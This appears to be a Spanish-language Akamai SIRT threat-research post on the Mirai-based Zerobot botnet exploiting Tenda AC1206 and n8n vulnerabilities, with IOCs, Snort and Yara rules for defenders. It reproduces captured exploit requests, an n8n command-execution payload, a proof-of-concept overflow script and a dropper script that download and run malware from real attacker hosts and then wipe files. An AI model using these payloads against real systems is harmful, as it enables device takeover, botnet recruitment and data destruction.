Resumen ejecutivo
- El equipo de respuesta e inteligencia en seguridad (SIRT) de Akamai ha identificado una explotación activa de las vulnerabilidades de inyección de comandos CVE-2025-7544 y CVE-2025-68613 contra routers Tenda AC1206 y la plataforma de automatización n8n.
- El SIRT identificó por primera vez actividad en nuestra red global de señuelos en enero de 2026. Se trata de la primera explotación activa de estas vulnerabilidades de la que tenemos constancia desde su divulgación inicial en julio de 2025 y diciembre de 2025, respectivamente.
- Hemos incluido una lista de indicadores de compromiso (IOC) en esta entrada de blog para ayudar en la defensa contra esta amenaza.
Introducción
El SIRT de Akamai descubrió una campaña de malware en curso basada en Mirai, denominada Zerobot, dirigida a una serie de CVE recientes, incluidas las que afectan a los routers Tenda AC1206 y la plataforma de automatización del flujo de trabajo n8n. La campaña de botnet se remonta al menos a principios de diciembre de 2025, con los recientes ataques identificados en nuestra red global de señuelos a mediados de enero de 2026 para propagar una variante del malware Mirai.
El objetivo de la vulnerabilidad n8n es particularmente interesante: las botnets suelen atacar a los dispositivos del Internet de las cosas (IoT), como cámaras de seguridad, DVR y routers, pero n8n se clasifica en una categoría completamente diferente.
Aunque no se trata de un comportamiento totalmente nuevo para las botnets, este tipo de segmentación supone un mayor peligro para las organizaciones al exponer la infraestructura más crítica a riesgos, ya que el ataque de n8n podría permitir el movimiento lateral de un atacante.
Vulnerabilidades objetivo
Las observaciones del SIRT indican que Zerobot se dirige a dos vulnerabilidades diferentes: CVE-2025-7544 e CVE-2025-68613. Las marcas de tiempo de sus intentos de explotación en nuestros señuelos tuvieron lugar después de la divulgación pública de las CVE, confirmando que estas vulnerabilidades no eran de día cero.
La explotación oportunista de vulnerabilidades recientemente reveladas por los atacantes es bastante común en la actualidad. Incluso las organizaciones más astutas que se encargan de la aplicación de parches a menudo tendrán una ventana vulnerable después de la divulgación inicial, y algunas organizaciones ignoran cualquier aplicación de parches a estos dispositivos.
Detalles de la CVE-2025-7544
Publicada a mediados de julio de 2025, la CVE-2025-7544 es un desbordamiento de búfer remoto basado en pilas que afecta al punto final /goform/setMacFilterCfg en dispositivos Tenda AC1206 en la versión 15.03.06.23 que se calificó como crítica y que se puede explotar a través del parámetro deviceList. Debido a la función parse_macfilter_rule, la variable s (técnicamente v3) se pasa a la función strcpy sin comprobar su longitud, lo que puede provocar un desbordamiento del búfer basado en pilas dest (que es el s_2).
Mediante la solicitud de la página, un atacante, incluso de forma remota, puede ejecutar fácilmente un ataque de denegación de servicio (DoS) o una ejecución remota de código (RCE). Hay disponible una prueba de concepto (PoC) pública que desglosa la vulnerabilidad y el ataque con más detalle (Figura 1).
import requests
ip = "192.168.0.1"
url = "http://" + ip + "/goform/setMacFilterCfg"
data = {
"macFilterType": "white",
"deviceList": "a" * 1000 + "\r" + "b" * 1000
}
response = requests.get(url, params=data)
print(response.text)Detalles de la CVE-2025-68613
La CVE-2025-68613, publicada a mediados de diciembre de 2025, es una vulnerabilidad de RCE que afecta al sistema de evaluación de expresiones de flujo de trabajo en la plataforma de automatización de flujo de trabajo n8n (en las versiones 0.211.0 hasta 1.20.4, y luego 1.21.1 y 1.22.0) que se calificó como crítica.
En n8n, los usuarios pueden escribir expresiones en flujos de trabajo para procesar datos de forma dinámica, pero estas expresiones no se evaluaron con un entorno de pruebas adecuado, lo que permite a los atacantes salir del contexto de ejecución previsto para ejecutar código arbitrario en el servidor. Al ejecutar estas expresiones en el sistema subyacente, el atacante también podría leer y escribir archivos en el servidor, robar variables de entorno como claves de API y establecer una persistencia.
La vulnerabilidad es bastante fácil de explotar, solo requiere un inicio de sesión de usuario sin privilegios administrativos y puede acceder a todos los datos a los que n8n tiene acceso. Muchas organizaciones utilizan n8n para diversos fines, como la integración de bases de datos con servicios en la nube, la automatización del procesamiento de datos, la gestión de datos confidenciales y la conexión de varias plataformas y sistemas internos. También hay disponible una prueba de concepto pública para esta vulnerabilidad.
Explotación activa de Tenda y n8n
El SIRT de Akamai ha descubierto intentos de explotación activos de CVE-2025-7544 por parte de Zerobot en nuestra red global de señuelos a partir de mediados de enero de 2026. Como puede ver en la Figura 2, el intento de explotación desencadena el desbordamiento del búfer mediante el uso de 500 caracteres "A" en el parámetro deviceList, que les permite ejecutar su código arbitrario. A continuación, la explotación descarga y ejecuta un script de shell malicioso denominado tol.sh desde la dirección IP 144.172.100.228 de EE. UU.
/goform/setMacFilterCfg
macFilterType=black&deviceList=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod 777 /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/tol.sh; curl -O http://144.172.100[.]228/tol.sh; chmod 777 tol.sh; sh tol.sh; tftp 140.233.190.96 -c get tol.sh; chmod 777 tol.sh; sh tol.sh; tftp -r 3.sh -g 140.233.190.96; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 140.233.190.96 2.sh 2.sh; sh 2.sh; rm -rf tol.sh tol.sh 3.sh 2.sh; rm -rf *; history -cEl SIRT también observó que Zerobot intentaba explotar una de las vulnerabilidades de n8n recientes: CVE-2025-68613 (Figura 3). La funcionalidad es en gran medida la misma que el otro intento de ataque, en el que descarga y ejecuta el script de shell tol.sh para recuperar y cargar la carga útil principal del malware de Mirai de zerobotv9.
/rest/workflow/run
{"workflowData":{"nodes":[{"parameters":{"command":"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod 777 /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/tol.sh; curl -O http://144.172.100[.]228/tol.sh; chmod 777 tol.sh; sh tol.sh; tftp 140.233.190.96 -c get tol.sh; chmod 777 tol.sh; sh tol.sh; tftp -r 3.sh -g 140.233.190.96; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 140.233.190.96 2.sh 2.sh; sh 2.sh; rm -rf tol.sh tol.sh 3.sh 2.sh; rm -rf *; history -c"},"name":"Exec","type":"n8n-nodes-base.executeCommand","typeVersion":1,"position":[100,100]}],"connections":{}}}
Aunque el ataque de una botnet basada en Mirai contra n8n no es inaudito, supone un cambio notable con respecto a la explotación típica de los dispositivos del IoT. La posibilidad de que una botnet obtenga acceso y persistencia, así como de que pueda utilizar el movimiento lateral, en la infraestructura crítica de una organización es sin duda un motivo de preocupación.
Botnet Zerobot
La secuencia de comandos de shell de la Figura 4 recupera y ejecuta la carga útil principal de malware basada en Mirai denominada zerobotv9, que admite una variedad de arquitecturas diferentes y que es común para los descargadores de Mirai. La carga útil empaquetada en UPX tiene una variedad de cadenas y parámetros cifrados, incluidos un dominio de mando y control integrado de 0bot.qzz[.]io y la cadena de ejecución común de la consola de malware Mirai, que en este caso es "bruh why again".
El apodo Zerobot se remonta a un artículo de Fortinet de 2022, pero se desconoce si los atacantes involucrados están relacionados. La nomenclatura indica que esta es la novena versión del malware Zerobot, pero se desconoce el paradero de las otras ocho versiones.
Aparte del descubrimiento inicial de 2022, encontramos muestras públicas de malware con el nombre zerobotv2 que datan de agosto de 2025, pero parecían ser la variante del malware Mirai LZRD de uso común.
#!/bin/bash
ulimit -n 1024
cp /bin/busybox /tmp/
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86; chmod +x *; ./zerobotv9.x86 zerobotv9.x86; rm -rf zerobotv9.x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mips; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mips; chmod +x *; ./zerobotv9.mips zerobotv9.mips; rm -rf zerobotv9.mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arc; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arc; chmod +x *; ./zerobotv9.arc zerobotv9.arc; rm -rf zerobotv9.arc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.i686; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.i686; chmod +x *; ./zerobotv9.i686 zerobotv9.i686; rm -rf zerobotv9.i686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86_64; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.x86_64; chmod +x *; ./zerobotv9.x86_64 zerobotv9.x86_64; rm -rf zerobotv9.x86_64
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mpsl; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.mpsl; chmod +x *; ./zerobotv9.mpsl zerobotv9.mpsl; rm -rf zerobotv9.mpsl
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm; chmod +x *; ./zerobotv9.arm zerobotv9.arm; rm -rf zerobotv9.arm
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm5; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm5; chmod +x *; ./zerobotv9.arm5 zerobotv9.arm5; rm -rf zerobotv9.arm5
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm6; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm6; chmod +x *; ./zerobotv9.arm6 zerobotv9.arm6; rm -rf zerobotv9.arm6
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm7; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.arm7; chmod +x *; ./zerobotv9.arm7 zerobotv9.arm7; rm -rf zerobotv9.arm7
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.ppc; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.ppc; chmod +x *; ./zerobotv9.ppc zerobotv9.ppc; rm -rf zerobotv9.ppc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.spc; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.spc; chmod +x *; ./zerobotv9.spc zerobotv9.spc; rm -rf zerobotv9.spc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.m68k; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.m68k; chmod +x *; ./zerobotv9.m68k zerobotv9.m68k; rm -rf zerobotv9.m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; chmod +x /sbin/wget /usr/sbin/wget /bin/wget /usr/bin/wget /sbin/curl /usr/sbin/curl /bin/curl /usr/bin/curl; wget http://144.172.100[.]228/mamakmukekkontol/zerobotv9.sh4; curl -O http://144.172.100[.]228/mamakmukekkontol/zerobotv9.sh4; chmod +x *; ./zerobotv9.sh4 zerobotv9.sh4; rm -rf zerobotv9.sh4Hay una variedad de diferencias entre el malware Zerobot original de 2022 y las muestras más recientes de Zerobotv9. La diferencia más notable es que el original es mucho más grande en cuanto al tamaño de archivo y está escrito en Go; Zerobotv9 es más pequeño y no está escrito en Go.
Sin embargo, encontramos algunas muestras etiquetadas con Zerobot de la dirección IP del descargador original que datan de octubre de 2022 y que no estaban escritas en Go. Tanto esta variante de octubre de 2022 como Zerobotv9 utilizan la misma clave XOR del malware Mirai original de 0XDEADBEEF o 0x22.
Esta nueva versión también tiene varias funciones de ataque de las que la antigua carecía, como TCPXmas, Mixamp, SSH y un método de ataque denominado Discord. Los agentes de usuario integrados se pueden ver en la Figura 5.
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; Info Path.3; SV1; .NET CLR 3.4.53360; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94Explotación adicional
Aunque la explotación activa de los dispositivos Tenda y la plataforma n8n es lo más destacado de esta entrada de blog, el SIRT también observó que Zerobot se centraba en otras vulnerabilidades, incluidas CVE-2017-9841 (Figura 6), CVE-2021-3129 (Figura 7) y CVE-2022-22947 (Figura 8), entre otras.
Estos intentos difieren un poco de los intentos de explotación resaltados, ya que utilizan netcat y socat para abrir una conexión TCP sin procesar y leer datos del socket a stdout, seguidos de comandos para ejecutar el script con el fin de cargar la carga útil principal del malware Mirai.
Los atacantes también utilizaron este método en las vulnerabilidades de n8n y Tenda, y tienen una variedad de alternativas, como el socket de Perl, el redireccionamiento TCP de Bash, el socket de PHP y el socket de Python. Esta técnica fue la que utilizaron por primera vez a principios de diciembre de 2025, antes de cambiar a herramientas como curl y wget en enero de 2026.
Conclusión
Lamentablemente, la proliferación de Mirai continúa a pesar de algunas eliminaciones de alto perfil recientes por parte de las fuerzas de orden público, ya que la creación de una botnet basada en Mirai puede tener una barrera de acceso bastante baja. Con el atractivo del dinero fácil (o simplemente de la emoción), un atacante relativamente inexperto puede simplemente reutilizar el antiguo código Mirai con algunas ligeras modificaciones, o incluso repetir el uso de herramientas de IA.
La investigación y el desarrollo para producir explotaciones de día cero tampoco son necesarios, ya que centrarse en las CVE reveladas recientemente o en el hardware obsoleto que algunas organizaciones olvidan actualizar puede ser bastante eficaz. Puede que esto no dé lugar a una botnet a gran escala que acabe siendo objeto de atención, como Aisuru, pero aun así puede reportar algunos beneficios a los operadores y permitirles pasar más fácilmente desapercibidos.
La divulgación es un beneficio neto
Como hemos notificado anteriormente, el programa CVE puede servir a veces como una espada de doble filo al arrojar luz sobre vulnerabilidades que, de otro modo, los atacantes podrían no detectar. Aunque creemos que el programa sigue siendo un beneficio neto para el sector, es importante tener en cuenta que los atacantes suelen monitorizar estas divulgaciones para detectar oportunidades de explotación antes de que las organizaciones puedan aplicarlas de forma efectiva.
Tanto las vulnerabilidades de Tenda como de n8n explotadas por Zerobot disponían de vulnerabilidades públicas de prueba de concepto, lo que puede aumentar drásticamente la sencillez y la propagación de la explotación activa. Especialmente teniendo en cuenta que las organizaciones utilizan a veces n8n en flujos de trabajo esenciales, es muy recomendable que cualquier organización potencialmente afectada proteja y aplique parches a sus sistemas lo antes posible para protegerse de esta u otra actividad maliciosa.
Información actualizada con Akamai
El SIRT de Akamai seguirá supervisando amenazas similares e informando sobre ellas tanto a nuestros clientes como a la comunidad de seguridad en general. Para mantenerse al día con el SIRT y otras publicaciones del grupo de inteligencia de seguridad de Akamai, consulte nuestra página de investigación y síganos en las redes sociales.
IoC
Hemos incluido una lista de IOC, así como las reglas de Snort y Yara, para ayudar a los expertos en protección.
Reglas de Snort para las IP maliciosas
alert ip any any -> [140.233.190.96, 144.172.100.228, 172.86.123.179, 216.126.227.101, 103.59.160.237] any (
msg:"Possible Botnet Infrastructure Activity - Suspicious IP";
sid:2000003;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)Reglas de Snort para la detección de resolución de dominio C2
alert http any any -> [0bot.qzz.io, andro.notemacro.com, pivot.notemacro.com] any (
msg:"Possible Botnet C2 or Malware Distribution - Suspicious Domain";
sid:2000002; rev:1;
classtype:trojan-activity;
metadata:service http, malware;
)Reglas de Yara para muestras de malware
rule Mirai_Malware_IOCs_1
{
meta:
description = "Detects files containing IOCs associated with potential Mirai malware"
author = "Akamai SIRT"
date = "2026-01-29"
source = "Akamai SIRT"
malware_family = "Mirai"
version = "1.0"
strings:
$bruh = "bruh why again"
$url1 = "mamakmukekkontol"
$url2 = "inihiddenngentod"
$ip1 = "140.233.190.96"
$ip2 = "144.172.100.228"
$ip3 = "172.86.123.179"
$ip4 = "216.126.227.101"
$ip5 = "103.59.160.237"
$domain1 = "0bot.qzz.io"
$domain2 = "andro.notemacro.com"
$domain3 = “pivot.notemacro.com”
$hash1 = "c8e8b627398ece071a3a148d6f38e46763dc534f9bfd967ebc8ac3479540111f"
$hash2 = "360467c3b733513c922b90d0e222067509df6481636926fa1786d0273169f4da"
$hash3 = "cc1efbca0da739b7784d833e56a22063ec4719cd095b16e3e10f77efd4277e24"
$hash4 = "045a1e42cb64e4aa91601f65a80ec5bd040ea4024c6d3b051cb1a6aa15d03b57"
$hash5 = "d024039824db6fe535ddd51bc81099c946871e4e280c48ed6e90dada79ccfcc7"
$hash6 = "deb70af83a9b3bb8f9424b709c3f6342d0c63aa10e7f8df43dd7a457bda8f060"
$hash7 = "6e4e797262c80b9117aded5d25ff2752cd83abe631096b66e120cc3599a82e4e"
$hash8 = "2fdb2a092f71e4eba2a114364dc8044a7aa7f78b32658735c5375bf1e4e8ece3"
$hash9 = "263a363e2483bf9fd9f915527f5b5255daa42bbfa1e606403169575d6555a58c"
$hash10 = "d7112dd3220ccb0b3e757b006acf9b92af466a285bbb0674258bcc9ad463f616"
condition:
(
$url1 or
$url2 or
$ip1 or
$ip2 or
$ip3 or
$ip4 or
$ip5 or
$domain1 or
$domain2 or
$domain3 or
$hash1 or
$hash2 or
$hash3 or
$hash4 or
$hash5 or
$hash6 or
$hash7 or
$hash8 or
$hash9 or
$hash10
)
}Direcciones IPv4 maliciosas
103.59.160.237
140.233.190.96
144.172.100.228
172.86.123.179
216.126.227.101
Dominios maliciosos
0bot.qzz.io
andro.notemacro[.]com/inihiddenngentod/zerobotv9.*
pivot.notemacro.com/inihiddenngentod/zerobotv9.*
Hashes SHA256
c8e8b627398ece071a3a148d6f38e46763dc534f9bfd967ebc8ac3479540111f
360467c3b733513c922b90d0e222067509df6481636926fa1786d0273169f4da
cc1efbca0da739b7784d833e56a22063ec4719cd095b16e3e10f77efd4277e24
045a1e42cb64e4aa91601f65a80ec5bd040ea4024c6d3b051cb1a6aa15d03b57
d024039824db6fe535ddd51bc81099c946871e4e280c48ed6e90dada79ccfcc7
deb70af83a9b3bb8f9424b709c3f6342d0c63aa10e7f8df43dd7a457bda8f060
6e4e797262c80b9117aded5d25ff2752cd83abe631096b66e120cc3599a82e4e
2fdb2a092f71e4eba2a114364dc8044a7aa7f78b32658735c5375bf1e4e8ece3
263a363e2483bf9fd9f915527f5b5255daa42bbfa1e606403169575d6555a58c
d7112dd3220ccb0b3e757b006acf9b92af466a285bbb0674258bcc9ad463f616
Etiquetas
